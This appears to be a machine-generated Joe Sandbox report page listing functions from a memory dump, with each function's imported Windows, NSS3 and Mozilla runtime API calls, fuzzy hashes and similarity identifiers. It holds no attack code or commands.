Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: CriticalEnterJoinSectionThreadfree$EventPollableValue
String ID:
API String ID: 235599594-0
Opcode ID: 9348e060a05609b5fdf48c05f13947d95b57e0320873e6a34f8f9d02a57dee76
Instruction ID: ade8fa65ac2569e34a550ab842bde843d8e94d14a5c6d76e7f6204f9d31d7681
Opcode Fuzzy Hash: 9348e060a05609b5fdf48c05f13947d95b57e0320873e6a34f8f9d02a57dee76
Instruction Fuzzy Hash: 52917EB5A04602DFCB50DF15C984856BBF1FF4931C72985A9D8195BB22E732FC4ACB81

Function 6C722980 Relevance: 22.7, APIs: 15, Instructions: 217COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,6C709E71,?,?,6C71F03D), ref: 6C7229A2
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6C709E71,?), ref: 6C7229B6
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,6C709E71,?,?,6C71F03D), ref: 6C7229E2
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6C709E71,?), ref: 6C7229F6
PL_HashTableLookup.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6C709E71,?), ref: 6C722A06
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,6C709E71), ref: 6C722A13

Part of subcall function 6C7ADD70: TlsGetValue.KERNEL32 ref: 6C7ADD8C
Part of subcall function 6C7ADD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C7ADDB4

PR_Unlock.NSS3(?), ref: 6C722A6A
TlsGetValue.KERNEL32 ref: 6C722A98
EnterCriticalSection.KERNEL32(?), ref: 6C722AAC
PL_HashTableLookup.NSS3(?,?), ref: 6C722ABC
PR_Unlock.NSS3(?), ref: 6C722AC9
TlsGetValue.KERNEL32 ref: 6C722B3D
EnterCriticalSection.KERNEL32(?), ref: 6C722B51
PL_HashTableLookup.NSS3(?,6C709E71), ref: 6C722B61
PR_Unlock.NSS3(?), ref: 6C722B6E

Part of subcall function 6C6F07A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C68204A), ref: 6C6F07AD
Part of subcall function 6C6F07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C68204A), ref: 6C6F07CD
Part of subcall function 6C6F07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C68204A), ref: 6C6F07D6
Part of subcall function 6C6F07A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C68204A), ref: 6C6F07E4
Part of subcall function 6C6F07A0: TlsSetValue.KERNEL32(00000000,?,6C68204A), ref: 6C6F0864
Part of subcall function 6C6F07A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C6F0880
Part of subcall function 6C6F07A0: TlsSetValue.KERNEL32(00000000,?,?,6C68204A), ref: 6C6F08CB
Part of subcall function 6C6F07A0: TlsGetValue.KERNEL32(?,?,6C68204A), ref: 6C6F08D7
Part of subcall function 6C6F07A0: TlsGetValue.KERNEL32(?,?,6C68204A), ref: 6C6F08FB

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: Value$CriticalSection$EnterUnlock$HashLookupTable$calloc$Leave
String ID:
API String ID: 2204204336-0
Opcode ID: f1c4fabe8ef3e92d88753cb81365de6dbd51dd07a06946fa795d2bdc4dee917d
Instruction ID: 683759e0daa554b8a0a5c3c2b18fed002780c63ed6c6498795260f525d8c02f1
Opcode Fuzzy Hash: f1c4fabe8ef3e92d88753cb81365de6dbd51dd07a06946fa795d2bdc4dee917d
Instruction Fuzzy Hash: 98714576D00205ABDF109F24DD488AA7B79FF1A328B098134EC189BB12FB31E955CBD0

Function 6C795CF0 Relevance: 22.7, APIs: 15, Instructions: 190COMMON

Download Yara Rule

APIs

Part of subcall function 6C792BE0: CERT_DestroyCertificate.NSS3(?,00000000,00000000,?,6C792A28,00000060,00000001), ref: 6C792BF0
Part of subcall function 6C792BE0: CERT_DestroyCertificate.NSS3(?,00000000,00000000,?,6C792A28,00000060,00000001), ref: 6C792C07
Part of subcall function 6C792BE0: SECKEY_DestroyPublicKey.NSS3(?,00000000,00000000,?,6C792A28,00000060,00000001), ref: 6C792C1E
Part of subcall function 6C792BE0: free.MOZGLUE(?,00000000,00000000,?,6C792A28,00000060,00000001), ref: 6C792C4A

free.MOZGLUE(?,?,6C79AAD4,?,?,?,?,?,?,?,?,00000000,?,6C7980C1), ref: 6C795D0F
free.MOZGLUE(?,?,?,6C79AAD4,?,?,?,?,?,?,?,?,00000000,?,6C7980C1), ref: 6C795D4E
free.MOZGLUE(?,?,?,6C79AAD4,?,?,?,?,?,?,?,?,00000000,?,6C7980C1), ref: 6C795D62
free.MOZGLUE(?,?,?,?,6C79AAD4,?,?,?,?,?,?,?,?,00000000,?,6C7980C1), ref: 6C795D85
free.MOZGLUE(?,?,?,?,6C79AAD4,?,?,?,?,?,?,?,?,00000000,?,6C7980C1), ref: 6C795D99
free.MOZGLUE(?,?,?,?,6C79AAD4,?,?,?,?,?,?,?,?,00000000,?,6C7980C1), ref: 6C795DFA
SECKEY_DestroyPrivateKey.NSS3(?,?,?,?,6C79AAD4,?,?,?,?,?,?,?,?,00000000,?,6C7980C1), ref: 6C795E33
SECKEY_DestroyPublicKey.NSS3(?,?,?,?,?,6C79AAD4,?,?,?,?,?,?,?,?,00000000), ref: 6C795E3E
free.MOZGLUE(?,?,?,?,?,?,6C79AAD4,?,?,?,?,?,?,?,?,00000000), ref: 6C795E47
free.MOZGLUE(?,?,?,?,6C79AAD4,?,?,?,?,?,?,?,?,00000000,?,6C7980C1), ref: 6C795E60
SECITEM_ZfreeItem_Util.NSS3(00000008,00000000,?,?,?,6C79AAD4,?,?,?,?,?,?,?,?,00000000), ref: 6C795E78
free.MOZGLUE(?,?,?,?,?,?,?,6C79AAD4), ref: 6C795EB9
free.MOZGLUE(?,?,?,?,?,?,?,6C79AAD4), ref: 6C795EF0
SECKEY_DestroyPrivateKey.NSS3(?,?,?,?,?,?,?,?,?,?,?,6C79AAD4), ref: 6C795F3D
SECKEY_DestroyPublicKey.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,6C79AAD4), ref: 6C795F4B

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: free$Destroy$Public$CertificatePrivate$Item_UtilZfree
String ID:
API String ID: 4273776295-0
Opcode ID: 8b006ca9e21f51af4f63f5db5a8c5c91a22afffbc3f4d81a92174a4e84635217
Instruction ID: 0b2950ab3b2628d9b8df0c7511c7738c246d28147aabce8c2e647c0f64a1e4c0
Opcode Fuzzy Hash: 8b006ca9e21f51af4f63f5db5a8c5c91a22afffbc3f4d81a92174a4e84635217
Instruction Fuzzy Hash: C371C2B4A00B009FD751CF20E989A92B7B5FF89309F148638E85E87B11E732F915CB91

Function 6C718DE0 Relevance: 22.7, APIs: 15, Instructions: 173memoryCOMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,?), ref: 6C718E22
EnterCriticalSection.KERNEL32(?), ref: 6C718E36
memset.VCRUNTIME140(?,00000000,?), ref: 6C718E4F
calloc.MOZGLUE(00000001,?,?,?), ref: 6C718E78
memcpy.VCRUNTIME140(-00000008,?,?), ref: 6C718E9B
memset.VCRUNTIME140(00000000,00000000,?), ref: 6C718EAC
PL_ArenaAllocate.NSS3(?,?), ref: 6C718EDE
memcpy.VCRUNTIME140(-00000008,?,?), ref: 6C718EF0
memset.VCRUNTIME140(?,00000000,?), ref: 6C718F00
free.MOZGLUE(?), ref: 6C718F0E
memcpy.VCRUNTIME140(?,?,?), ref: 6C718F39
memset.VCRUNTIME140(?,00000000,?), ref: 6C718F4A
memset.VCRUNTIME140(?,00000000,?), ref: 6C718F5B
PR_Unlock.NSS3(?), ref: 6C718F72
PR_Unlock.NSS3(?), ref: 6C718F82

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: memset$memcpy$Unlock$AllocateArenaCriticalEnterSectionValuecallocfree
String ID:
API String ID: 1569127702-0
Opcode ID: 042b207c13e51a2fdb9bae6ad52acbc1078f5ea72b612f30547a99bc21f07fed
Instruction ID: 7febcb0046aabc4f92cb833f9eec63656a799f4ad942e7bde7ee903c27cd265b
Opcode Fuzzy Hash: 042b207c13e51a2fdb9bae6ad52acbc1078f5ea72b612f30547a99bc21f07fed
Instruction Fuzzy Hash: 2A5106B2D042059FE7108E68CD849AAB7B9EF45318F1A4539EC089BF00E731ED4587D1

Function 6C73CE90 Relevance: 22.6, APIs: 15, Instructions: 129COMMON

Download Yara Rule

APIs

PK11_DoesMechanism.NSS3(?,00000132), ref: 6C73CE9E
PK11_DoesMechanism.NSS3(?,00000321), ref: 6C73CEBB
PK11_DoesMechanism.NSS3(?,00001081), ref: 6C73CED8
PK11_DoesMechanism.NSS3(?,00000551), ref: 6C73CEF5
PK11_DoesMechanism.NSS3(?,00000651), ref: 6C73CF12
PK11_DoesMechanism.NSS3(?,00000321), ref: 6C73CF2F
PK11_DoesMechanism.NSS3(?,00000121), ref: 6C73CF4C
PK11_DoesMechanism.NSS3(?,00000400), ref: 6C73CF69
PK11_DoesMechanism.NSS3(?,00000341), ref: 6C73CF86
PK11_DoesMechanism.NSS3(?,00000311), ref: 6C73CFA3
PK11_DoesMechanism.NSS3(?,00000301), ref: 6C73CFBC
PK11_DoesMechanism.NSS3(?,00000331), ref: 6C73CFD5
PK11_DoesMechanism.NSS3(?,00000101), ref: 6C73CFEE
PK11_DoesMechanism.NSS3(?,00000141), ref: 6C73D007
PK11_DoesMechanism.NSS3(?,00001008), ref: 6C73D021

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: DoesK11_Mechanism
String ID:
API String ID: 622698949-0
Opcode ID: c609708ecc05f08e56bb69c1b70e37aefe8df33e1a02ba745add6446eb52fb33
Instruction ID: d4bf285ae2deb66f46143bc34a32f456365c1ec4d679cb35de28c54153722cbf
Opcode Fuzzy Hash: c609708ecc05f08e56bb69c1b70e37aefe8df33e1a02ba745add6446eb52fb33
Instruction Fuzzy Hash: 6631237176292027EF0E50565F2DBDE144A4B6570EF841038F94AE57C1FBCA962702A9

Function 6C810FF0 Relevance: 22.6, APIs: 15, Instructions: 92COMMON

Download Yara Rule

APIs

PR_Lock.NSS3(?), ref: 6C811000

Part of subcall function 6C7C9BA0: TlsGetValue.KERNEL32(00000000,00000000,?,6C6F1A48), ref: 6C7C9BB3
Part of subcall function 6C7C9BA0: EnterCriticalSection.KERNEL32(?,?,?,?,6C6F1A48), ref: 6C7C9BC8

PR_SetError.NSS3(FFFFE8D5,00000000), ref: 6C811016

Part of subcall function 6C7AC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C7AC2BF

PR_Unlock.NSS3(?), ref: 6C811021

Part of subcall function 6C7ADD70: TlsGetValue.KERNEL32 ref: 6C7ADD8C
Part of subcall function 6C7ADD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C7ADDB4

PR_SetError.NSS3(FFFFE89D,00000000), ref: 6C811046
PR_Unlock.NSS3(?), ref: 6C81106B
PR_Lock.NSS3 ref: 6C811079
PR_Unlock.NSS3 ref: 6C811096
free.MOZGLUE(?), ref: 6C8110A7
free.MOZGLUE(?), ref: 6C8110B4
PR_DestroyCondVar.NSS3(?), ref: 6C8110BF
PR_DestroyCondVar.NSS3(?), ref: 6C8110CA
PR_DestroyCondVar.NSS3(?), ref: 6C8110D5
PR_DestroyCondVar.NSS3(?), ref: 6C8110E0
PR_DestroyLock.NSS3(?), ref: 6C8110EB
free.MOZGLUE(?), ref: 6C811105

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: Destroy$Cond$LockUnlockValuefree$CriticalErrorSection$EnterLeave
String ID:
API String ID: 8544004-0
Opcode ID: 2083544125214590cd9bfa16def9989024a057fe55cd3e045eb7bcf64b661038
Instruction ID: ca9553b5c03eaa62183eb6ea3586197218d4f9954688533e46560c0e72b2a353
Opcode Fuzzy Hash: 2083544125214590cd9bfa16def9989024a057fe55cd3e045eb7bcf64b661038
Instruction Fuzzy Hash: E831AFB9900402AFD7119F10EE4AA45BBB2BF1131CB084231E80903F61E732F878DBD6

Function 6C68DC60 Relevance: 21.3, APIs: 9, Strings: 3, Instructions: 282COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,?,?), ref: 6C68DD56
memcpy.VCRUNTIME140(0000FFFE,?,?), ref: 6C68DD7C
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(00000000), ref: 6C68DE67
memcpy.VCRUNTIME140(0000FFFC,?,?), ref: 6C68DEC4
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C68DECD

Strings

9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C68DF6D, 6C68DFCC, 6C68DFDD
database corruption, xrefs: 6C68DF77, 6C68DFE7
%s at line %d of [%.10s], xrefs: 6C68DF7C, 6C68DFEC

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: memcpy$_byteswap_ulong
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 2339628231-598938438
Opcode ID: aaa8987bbb4e519171f223746a229fd2ff9b189740c24443176d41d9c9642208
Instruction ID: 71490a6ea7a00de47fcafa1378a9ff52706f4575af5b555b202b7c3e9a566528
Opcode Fuzzy Hash: aaa8987bbb4e519171f223746a229fd2ff9b189740c24443176d41d9c9642208
Instruction Fuzzy Hash: DAA1F7716052129FC710DF29C880A6BB7F5EF85318F15896EF8899BB41D730E845CBB5

Function 6C74EDD0 Relevance: 21.2, APIs: 14, Instructions: 239memoryCOMMON

Download Yara Rule

APIs

PORT_Alloc_Util.NSS3(?), ref: 6C74EE0B

Part of subcall function 6C760BE0: malloc.MOZGLUE(6C758D2D,?,00000000,?), ref: 6C760BF8
Part of subcall function 6C760BE0: TlsGetValue.KERNEL32(6C758D2D,?,00000000,?), ref: 6C760C15

PR_SetError.NSS3(FFFFE013,00000000), ref: 6C74EEE1

Part of subcall function 6C741D50: TlsGetValue.KERNEL32(00000000,-00000018), ref: 6C741D7E
Part of subcall function 6C741D50: EnterCriticalSection.KERNEL32(?), ref: 6C741D8E
Part of subcall function 6C741D50: PR_Unlock.NSS3(?), ref: 6C741DD3

TlsGetValue.KERNEL32 ref: 6C74EE51
EnterCriticalSection.KERNEL32(?), ref: 6C74EE65
PR_Unlock.NSS3(?), ref: 6C74EEA2
free.MOZGLUE(?), ref: 6C74EEBB
PR_SetError.NSS3(00000000,00000000), ref: 6C74EED0
PR_Unlock.NSS3(?), ref: 6C74EF48
free.MOZGLUE(?), ref: 6C74EF68
PR_SetError.NSS3(00000000,00000000), ref: 6C74EF7D
PK11_DoesMechanism.NSS3(?,?), ref: 6C74EFA4
free.MOZGLUE(?), ref: 6C74EFDA
PR_SetError.NSS3(FFFFE040,00000000), ref: 6C74F055
free.MOZGLUE(?), ref: 6C74F060

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: Errorfree$UnlockValue$CriticalEnterSection$Alloc_DoesK11_MechanismUtilmalloc
String ID:
API String ID: 2524771861-0
Opcode ID: 76af56d94e40bd125f257b366ce72d627382f26af8949997be2abb77a6d77ec7
Instruction ID: 2dd6011ae373733a7db56b31d6e41587ab6e60ed76628556b97b019cb0f0f081
Opcode Fuzzy Hash: 76af56d94e40bd125f257b366ce72d627382f26af8949997be2abb77a6d77ec7
Instruction Fuzzy Hash: 23818475A00219ABEB40DFA5DD49EDEBBB9BF08318F544034E909A3611E731E924CBE1

Function 6C714CF0 Relevance: 21.2, APIs: 14, Instructions: 237memoryCOMMON

Download Yara Rule

APIs

PK11_SignatureLen.NSS3(?), ref: 6C714D80
PORT_Alloc_Util.NSS3(00000000), ref: 6C714D95
PORT_NewArena_Util.NSS3(00000800), ref: 6C714DF2
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C714E2C
PR_SetError.NSS3(FFFFE028,00000000), ref: 6C714E43
PORT_NewArena_Util.NSS3(00000800), ref: 6C714E58
SGN_CreateDigestInfo_Util.NSS3(00000001,?,?), ref: 6C714E85
DER_Encode_Util.NSS3(?,?,6C8605A4,00000000), ref: 6C714EA7
PK11_SignWithMechanism.NSS3(?,-00000001,00000000,?,?), ref: 6C714F17
DSAU_EncodeDerSigWithLen.NSS3(?,?,?), ref: 6C714F45
SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C714F62
PORT_FreeArena_Util.NSS3(?,00000001), ref: 6C714F7A
PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C714F89
SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C714FC8

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: Util$Arena_$ErrorFreeItem_K11_WithZfree$Alloc_CreateDigestEncodeEncode_Info_MechanismSignSignature
String ID:
API String ID: 2843999940-0
Opcode ID: 42dbf3fc75613c57e6f0d2b0d47834e2cc6edf08746c9e6e497b3694213b1203
Instruction ID: cb67e5d9e4648986da3ddf1722b920506a9be8e2cedbf489923b9ba56acbce98
Opcode Fuzzy Hash: 42dbf3fc75613c57e6f0d2b0d47834e2cc6edf08746c9e6e497b3694213b1203
Instruction Fuzzy Hash: C181A271908301AFE711CF25DA44B5AB7E8AB8475CF1C852DF958DBB40E731EA08CB92

Function 6C755C10 Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 221COMMON

Download Yara Rule

APIs

SECMOD_DestroyModule.NSS3(00000000,?,?,?,?,?), ref: 6C755C9B
PR_SetError.NSS3(FFFFE043,00000000,?,?,?,?,?), ref: 6C755CF4
SECMOD_DestroyModule.NSS3(00000000,?,?,?,?,?,?,?), ref: 6C755CFD
PR_smprintf.NSS3(tokens=[0x%x=<%s>],00000004,00000000,?,?,?,?,?,?), ref: 6C755D42
free.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?), ref: 6C755D4E
free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C755D78
PR_SetError.NSS3(FFFFE013,00000000,?,?,?,?,?,?,?,?,?,?), ref: 6C755E18
TlsGetValue.KERNEL32 ref: 6C755E5E
EnterCriticalSection.KERNEL32(?), ref: 6C755E72
PR_Unlock.NSS3(?), ref: 6C755E8B

Part of subcall function 6C74F820: free.MOZGLUE(6A1B7500,2404110F,?,?), ref: 6C74F854
Part of subcall function 6C74F820: free.MOZGLUE(FFD3F9E8,2404110F,?,?), ref: 6C74F868
Part of subcall function 6C74F820: DeleteCriticalSection.KERNEL32(04C4841B,2404110F,?,?), ref: 6C74F882
Part of subcall function 6C74F820: free.MOZGLUE(04C483FF,?,?), ref: 6C74F889
Part of subcall function 6C74F820: DeleteCriticalSection.KERNEL32(CCCCCCDF,2404110F,?,?), ref: 6C74F8A4
Part of subcall function 6C74F820: free.MOZGLUE(CCCCCCC3,?,?), ref: 6C74F8AB
Part of subcall function 6C74F820: DeleteCriticalSection.KERNEL32(280F1108,2404110F,?,?), ref: 6C74F8C9
Part of subcall function 6C74F820: free.MOZGLUE(280F10EC,?,?), ref: 6C74F8D0

Strings

tokens=[0x%x=<%s>], xrefs: 6C755D3D
d, xrefs: 6C755C36

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: free$CriticalSection$Delete$DestroyErrorModule$EnterR_smprintfUnlockValue
String ID: d$tokens=[0x%x=<%s>]
API String ID: 2028831712-1373489631
Opcode ID: 6fdfc4c4bcf87b119f6eae8469b0995be576a2c9802b9775b7103276692051ee
Instruction ID: b77a3869ba8418b6c6c1ff8eb975d92e0de3d2116c8beeec4c382c5e3ae2cdfd
Opcode Fuzzy Hash: 6fdfc4c4bcf87b119f6eae8469b0995be576a2c9802b9775b7103276692051ee
Instruction Fuzzy Hash: 787117F1F042019BEB419F25EE4976A3279AF4531CF944039E8099AB42EF36E935C7D2

Function 6C748F40 Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON

Download Yara Rule

APIs

SECOID_GetAlgorithmTag_Util.NSS3(6C749582), ref: 6C748F5B

Part of subcall function 6C75BE30: SECOID_FindOID_Util.NSS3(6C71311B,00000000,?,6C71311B,?), ref: 6C75BE44

PORT_NewArena_Util.NSS3(00000800), ref: 6C748F6A

Part of subcall function 6C760FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C7087ED,00000800,6C6FEF74,00000000), ref: 6C761000
Part of subcall function 6C760FF0: PR_NewLock.NSS3(?,00000800,6C6FEF74,00000000), ref: 6C761016
Part of subcall function 6C760FF0: PL_InitArenaPool.NSS3(00000000,security,6C7087ED,00000008,?,00000800,6C6FEF74,00000000), ref: 6C76102B

SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6C748FC3
PK11_GetIVLength.NSS3(-00000001), ref: 6C748FE0
SEC_ASN1DecodeItem_Util.NSS3(?,?,6C82D820,6C749576), ref: 6C748FF9
DER_GetInteger_Util.NSS3(?), ref: 6C74901D
PORT_ZAlloc_Util.NSS3(?), ref: 6C74903E
SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C749062
memcpy.VCRUNTIME140(00000024,?,?), ref: 6C7490A2
PORT_ZAlloc_Util.NSS3(?), ref: 6C7490CA
memcpy.VCRUNTIME140(00000018,?,?), ref: 6C7490F0
PR_SetError.NSS3(FFFFE006,00000000), ref: 6C74912D
free.MOZGLUE(00000000), ref: 6C749136
PORT_FreeArena_Util.NSS3(?,00000001), ref: 6C749145

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

